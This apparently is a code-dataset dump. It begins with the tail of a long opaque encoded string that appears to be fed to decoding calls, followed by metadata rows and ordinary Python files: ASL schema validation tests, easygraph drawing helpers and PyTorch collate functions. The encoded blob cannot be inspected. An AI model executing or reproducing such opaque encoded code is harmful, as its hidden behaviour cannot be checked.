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"))))
```

avg_line_length: 2,201.5 | max_line_length: 8,722 | alphanum_fraction: 0.966727
qsc quality signals and flags (schema order): 269 | 8,806 | 31.64684 | 0.966543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144644 | 0.001363 | 8,806 | 4 | 8,722 | 2,201.5 | 0.823402 | 0.005678 | 0 | 0 | 0 | 0.5 | 0.989945 | 0.989945 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0
effective: 0 | hits: 10
---

hexsha: 3e33af8fadad4d484852f7e1c912c8352e09aafd | size: 13,216 | ext: py | lang: Python

- repo: gold-standard-phantoms/BIDS-JSON-Schema @ b24de8b444646d2716eb9ca72922139ec1d1d436, path: src/test_asl_schema.py, licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks views)
- max_stars_count: null | max_issues_count: null | max_forks_count: null

content:

```python
import json
import pytest
import os
from definitions import SRC_ROOT
from jsonschema import Draft7Validator
@pytest.fixture()
def set_test_variables():
"""
Sets up variables for the unit tests below.
:return: dictionary of test input variables for the unit tests.
"""
test_variables = {
"asl_valid_full": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema001.json"
),
"asl_valid_absent_conditional_field": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema002.json"
),
"asl_valid_labeling_duration_array": os.path.join(
SRC_ROOT, "resources/schemas/tests_jsons/asl_valid/test_asl_schema003.json"
),
"asl_schema": os.path.join(SRC_ROOT, "resources/schemas/asl_bids_schema.json"),
}
return test_variables
def test_valid_data_all_fields_specified(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-001
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following exactly the definition set in the json schema gets
validated correctly.
:inputs: A dictionary object following exactly the structure defined in the asl schema, with all mandatory and
optional fields specified.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
validator.check_schema(schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_valid_data_missing_conditional_field(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-002
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following the definition set in the json schema gets validated
correctly.
:inputs: A dictionary object following the structure defined in the asl schema but missing a conditional field.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_absent_conditional_field"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_invalid_data_missing_conditional_field(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-011
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema but missing a conditional
field; the field governing the condition (BolusCut-offFlag) is set to true, so the conditional field
(BolusCut-offDelayTime) becomes mandatory but is missing.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_absent_conditional_field"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# mess up data so validation fails
# set this key to true and the validator should pick up on the missing conditional field
data["BolusCut-offFlag"] = True
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_valid_data_conditional_type_array(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-003
:req_id: D2N-FUN-REQ-003
:description: This test verifies that a valid structure following the definition set in the json schema gets
validated correctly.
:inputs: A dictionary object largely following the structure defined in the asl schema. The twist here is that the
LabelingDuration field is an array instead of a single int; as this is allowed in the schema, it should not affect
the validation.
:criteria: This test is considered passed if the validation method returns True.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_labeling_duration_array"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is True
def test_invalid_data_wrong_field_type(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-004
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field identified as an array in the schema is replaced by a single numeric value.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Should be an array; let's replace it with an integer
data["BackgroundSuppressionPulseTime"] = 16
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_missing_required_key(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-005
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field identified as required in the schema is omitted.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Let's remove a required key
data.pop("EchoTime", 0)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_type_in_array(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-006
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field identified as an array of numbers in the schema is replaced by an array containing numbers and a string.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Should be an array of numbers, will put a string in the list
data["FlipAngles"] = [0, "yeah messing around", 14, 60]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_unexpected_field_value(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-007
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field whose possible values are set in an enumeration in the schema is set to an unexpected value (not part of the
enumeration).
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Value should be part of an enum, but let's fill in an unexpected value
data["ASLContext"] = "And still the type is right"
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_array_size(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-008
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field identified as an array in the schema is set to an array of the wrong size.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Array should have three pairs of two elements each; let's add a fourth pair
data["LabelingOrientation"] = [[12, 11], [10, 12], [7, 6], [2, 2]]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_wrong_internal_array_size(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-009
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The 'mistake' here is that a
field identified as an array in the schema is set to an array with an inner element of the wrong size.
:criteria: This test is considered passed if the validation method returns False.
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Array should have three pairs of two elements each; let's make one pair a triple
data["LocationOfLabelingPlane"] = [[12, 11], [10, 12], [7, 6, 5]]
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
def test_invalid_data_multiple_errors(set_test_variables):
"""
:test_id: ASL-SCHEMA-TEST-010
:req_id: D2N-FUN-REQ-003
:description: This test verifies that an invalid structure does not get validated against our schema.
:inputs: A dictionary object largely following the structure defined in the asl schema. The object gathers all the
mistakes tested previously.
:criteria: This test is considered passed if the validation method returns False and the number of errors is
correctly counted (6).
"""
asl_schema = set_test_variables["asl_schema"]
asl_valid = set_test_variables["asl_valid_full"]
with open(asl_schema, "r", encoding="utf-8") as fp:
schema = json.load(fp)
with open(asl_valid, "r", encoding="utf-8") as fp:
data = json.load(fp)
# Mess up data so that the validation fails
# Let's take all examples from the tests above
data["LocationOfLabelingPlane"] = [[12, 11], [10, 12], [7, 6, 5]]
data["LabelingOrientation"] = [[12, 11], [10, 12], [7, 6], [2, 2]]
data["ASLContext"] = "And still the type is right"
data["FlipAngles"] = [0, "yeah messing around", 14, 60]
data["BackgroundSuppressionPulseTime"] = 16
data.pop("EchoTime", 0)
validator = Draft7Validator(schema=schema)
valid = validator.is_valid(instance=data)
assert valid is False
error_count = sum(1 for _ in validator.iter_errors(instance=data))
assert error_count == 6
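# Illustrative sketch (not part of the original test module): when validation
# fails, jsonschema can also report each individual error, which is handy for
# debugging the fixtures above. Assuming the same `schema` and `data`
# dictionaries as loaded in the tests:
#
#     validator = Draft7Validator(schema=schema)
#     for error in validator.iter_errors(instance=data):
#         print(list(error.absolute_path), error.message)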
| 39.807229
| 123
| 0.711789
| 1,937
| 13,216
| 4.713474
| 0.112545
| 0.055203
| 0.059584
| 0.045783
| 0.847097
| 0.829025
| 0.825411
| 0.819606
| 0.784666
| 0.768018
| 0
| 0.01761
| 0.200817
| 13,216
| 331
| 124
| 39.927492
| 0.846809
| 0.443932
| 0
| 0.763514
| 0
| 0
| 0.156553
| 0.072556
| 0
| 0
| 0
| 0
| 0.081081
| 1
| 0.081081
| false
| 0
| 0.033784
| 0
| 0.121622
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e43d7887767ef9a3df119ea5e06bbc22357dab5b
| 3,706
|
py
|
Python
|
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
easygraph/functions/drawing/drawing.py
|
coreturn/Easy-Graph
|
ee46d84250c4d4cf22271ca13449b15fad88ad7b
|
[
"BSD-3-Clause"
] | null | null | null |
import easygraph as eg
import matplotlib.pyplot as plt
import numpy as np
import random
__all__ = [
"draw_SHS_center",
"draw_SHS_center_kk",
"draw_kamada_kawai"
]
def draw_SHS_center(G, SHS):
"""
Draw the graph with the SH Spanners placed in the center, using a random layout.
Parameters
----------
G : graph
An easygraph graph.
SHS : list
The SH Spanners in graph G.
Returns
-------
None
The graph is drawn with matplotlib and shown via plt.show().
"""
pos=eg.random_position(G)
center=np.zeros((len(SHS),2),float)
node=np.zeros((len(pos),2),float)
m,n=0,0
for i in pos:
if i in SHS:
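# SH Spanner nodes are pulled toward the plot center (0.5, 0.5): the
# (-1)**random.randint(1,2) factor picks a random sign, and dividing by 5
# shrinks the offset so spanners cluster near the middle of the figure.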
node[m][0]=0.5+(-1)**random.randint(1,2)*pos[i][0]/5
node[m][1]=0.5+(-1)**random.randint(1,2)*pos[i][1]/5
center[n][0]=node[m][0]
center[n][1]=node[m][1]
pos[i][0]=node[m][0]
pos[i][1]=node[m][1]
m+=1
n+=1
else:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
plt.scatter(center[:,0], center[:,1], marker = '*', color = 'r', s=20)
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
def draw_SHS_center_kk(G, SHS):
"""
Draw the graph with the SH Spanners placed in the center, using a Kamada-Kawai force-directed layout.
Parameters
----------
G : graph
An easygraph graph.
SHS : list
The SH Spanners in graph G.
Returns
-------
None
The graph is drawn with matplotlib and shown via plt.show().
"""
pos=eg.kamada_kawai_layout(G)
center=np.zeros((len(SHS),2),float)
node=np.zeros((len(pos),2),float)
m,n=0,0
for i in pos:
if i in SHS:
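# Kamada-Kawai coordinates are roughly centered on the origin, so dividing
# a spanner's coordinates by 5 moves that node toward the center of the
# drawing.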
node[m][0]=pos[i][0]/5
node[m][1]=pos[i][1]/5
center[n][0]=node[m][0]
center[n][1]=node[m][1]
pos[i][0]=node[m][0]
pos[i][1]=node[m][1]
m+=1
n+=1
else:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
plt.scatter(center[:,0], center[:,1], marker = '*', color = 'r', s=20)
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
def draw_kamada_kawai(G):
"""Draw the graph G with a Kamada-Kawai force-directed layout.
Parameters
----------
G : graph
An easygraph graph
"""
pos=eg.kamada_kawai_layout(G)
node=np.zeros((len(pos),2),float)
m=0
for i in pos:
node[m][0]=pos[i][0]
node[m][1]=pos[i][1]
m+=1
plt.scatter(node[:,0], node[:,1], marker = '.', color = 'b', s=10)
for i in pos:
plt.text(pos[i][0], pos[i][1], i,
fontsize=5,
verticalalignment="top",
horizontalalignment="right")
for i in G.edges:
p1=[pos[i[0]][0],pos[i[1]][0]]
p2=[pos[i[0]][1],pos[i[1]][1]]
plt.plot(p1,p2, 'k--',alpha=0.3)
plt.show()
return
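# Usage sketch (illustrative; assumes easygraph's Graph/add_edges API, which
# may differ across versions, and an arbitrary edge list):
#
#     G = eg.Graph()
#     G.add_edges([(1, 2), (2, 3), (3, 1), (3, 4)])
#     draw_kamada_kawai(G)          # plain Kamada-Kawai drawing
#     draw_SHS_center(G, SHS=[3])   # node 3 highlighted as a central star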
| 24.872483
| 102
| 0.490826
| 599
| 3,706
| 2.998331
| 0.126878
| 0.071269
| 0.044543
| 0.026726
| 0.886414
| 0.886414
| 0.864143
| 0.853007
| 0.853007
| 0.830735
| 0
| 0.05684
| 0.311657
| 3,706
| 148
| 103
| 25.040541
| 0.647197
| 0.178899
| 0
| 0.828283
| 0
| 0
| 0.032025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.040404
| 0
| 0.10101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e49b5a508a98e7501797e89f84d22f59d1b5eac0
| 1,515
|
py
|
Python
|
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | null | null | null |
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | null | null | null |
cords/utils/data/data_utils/collate.py
|
krishnatejakk/AUTOMATA
|
fd0cf58058e39660f88d9d6b4101e30a497f6ce2
|
[
"MIT"
] | 1
|
2022-03-16T05:55:12.000Z
|
2022-03-16T05:55:12.000Z
|
import torch
def collate_fn_pad_batch(data):
"""Pad data in a batch.
Parameters
----------
data : list((tensor, int), )
data and label in a batch
Returns
-------
tuple(tensor, tensor)
"""
num_items = len(data[0])
max_len = max([i[0].shape[0] for i in data])
labels = torch.tensor([i[1] for i in data], dtype=torch.long)
padded = torch.zeros((len(data), max_len), dtype=torch.long)
if num_items == 3:
weights = torch.tensor([i[2] for i in data], dtype=torch.float)
# randomizing might be better
for i, _ in enumerate(padded):
padded[i][:data[i][0].shape[0]] = data[i][0]
if num_items == 3:
return padded, labels, weights
else:
return padded, labels
def max_len_pad(data):
"""Pad data globally.
Parameters
----------
data : list((tensor, int), )
data and label in a batch
Returns
-------
tuple(tensor, tensor)
"""
# Determine the global maximum sequence length across all samples
max_len = max(sample[0].shape[0] for sample in data)
num_items = len(data[0])
labels = torch.tensor([i[1] for i in data], dtype=torch.long)
padded = torch.zeros((len(data), max_len), dtype=torch.long)
if num_items == 3:
weights = torch.tensor([i[2] for i in data], dtype=torch.float)
# randomizing might be better
for i, _ in enumerate(padded):
padded[i][:data[i][0].shape[0]] = data[i][0]
if num_items == 3:
return padded, labels, weights
else:
return padded, labels
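# Usage sketch (illustrative; `dataset` is a hypothetical map-style dataset
# yielding (1-D LongTensor, int label) pairs):
#
#     from torch.utils.data import DataLoader
#     loader = DataLoader(dataset, batch_size=4, collate_fn=collate_fn_pad_batch)
#     for padded, labels in loader:
#         ...  # padded: (batch, max_len) LongTensor; labels: (batch,) LongTensor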
| 29.134615
| 71
| 0.576238
| 220
| 1,515
| 3.890909
| 0.213636
| 0.03271
| 0.049065
| 0.058411
| 0.834112
| 0.796729
| 0.796729
| 0.796729
| 0.796729
| 0.796729
| 0
| 0.018083
| 0.269967
| 1,515
| 52
| 72
| 29.134615
| 0.755877
| 0.220462
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.241379
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
